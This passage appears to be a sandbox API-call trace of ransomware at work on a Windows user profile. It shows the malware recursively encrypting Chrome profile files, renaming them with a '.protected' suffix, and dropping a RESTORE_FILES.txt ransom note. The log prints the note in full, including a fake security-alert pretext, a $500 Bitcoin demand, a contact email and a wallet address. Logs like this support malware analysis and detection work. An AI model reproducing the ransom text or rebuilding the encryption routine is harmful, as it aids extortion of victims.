returned 1 [0084.144] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.protected") returned 115 [0084.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\2B04.tmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\2b04.tmp.protected")) returned 1 [0084.145] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.145] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.145] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\RESTORE_FILES.txt") returned 114 [0084.145] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\JumpListIconsOld\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\jumplisticonsold\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.161] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.161] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.162] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.162] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.162] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.162] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.162] CloseHandle (hObject=0x154) returned 1 [0084.162] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Windows") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Program Files") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="Program Files (x86)") returned -1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="$Recycle.bin") returned 1 [0084.162] lstrcmpiW (lpString1="Local Extension Settings", lpString2="System Volume Information") returned -1 [0084.162] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings") returned 104 [0084.162] lstrcmpW (lpString1="Local Extension Settings", lpString2=".") returned 1 [0084.162] lstrcmpW (lpString1="Local Extension Settings", lpString2="..") returned 1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*") returned 106 [0084.163] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.163] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.163] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.163] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\.") returned 106 [0084.163] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.163] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.163] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.163] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\..") returned 107 [0084.163] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.163] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.163] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Windows") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files (x86)") returned -1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="$Recycle.bin") returned 1 [0084.164] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="System Volume Information") returned -1 [0084.164] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned 137 [0084.164] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2=".") returned 1 [0084.164] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="..") returned 1 [0084.164] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*") returned 139 [0084.164] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0084.165] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.165] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.165] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\.") returned 139 [0084.166] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.166] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.166] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.166] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\..") returned 140 [0084.166] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.166] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.166] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="Program Files (x86)") returned -1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0084.166] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0084.166] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.166] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0084.166] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0084.166] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.166] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.166] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0084.167] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log") returned 148 [0084.167] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0084.167] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.167] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.167] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.167] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.167] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.168] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.168] CloseHandle (hObject=0x15c) returned 1 [0084.169] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected") returned 158 [0084.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\000003.log.protected")) returned 1 [0084.170] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0084.170] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0084.170] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.170] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0084.170] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0084.170] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.170] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.170] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0084.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.171] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0084.171] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT") returned 145 [0084.171] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0084.171] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x10, lpOverlapped=0x0) returned 1 [0084.172] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.172] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.172] CloseHandle (hObject=0x15c) returned 1 [0084.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.protected") returned 155 [0084.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\current.protected")) returned 1 [0084.173] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0084.173] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0084.173] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.173] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0084.173] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0084.173] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.173] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0084.174] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK") returned 142 [0084.174] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0084.174] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.174] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.174] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x0, lpOverlapped=0x0) returned 1 [0084.174] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.174] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.175] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.175] CloseHandle (hObject=0x15c) returned 1 [0084.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.protected") returned 152 [0084.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local 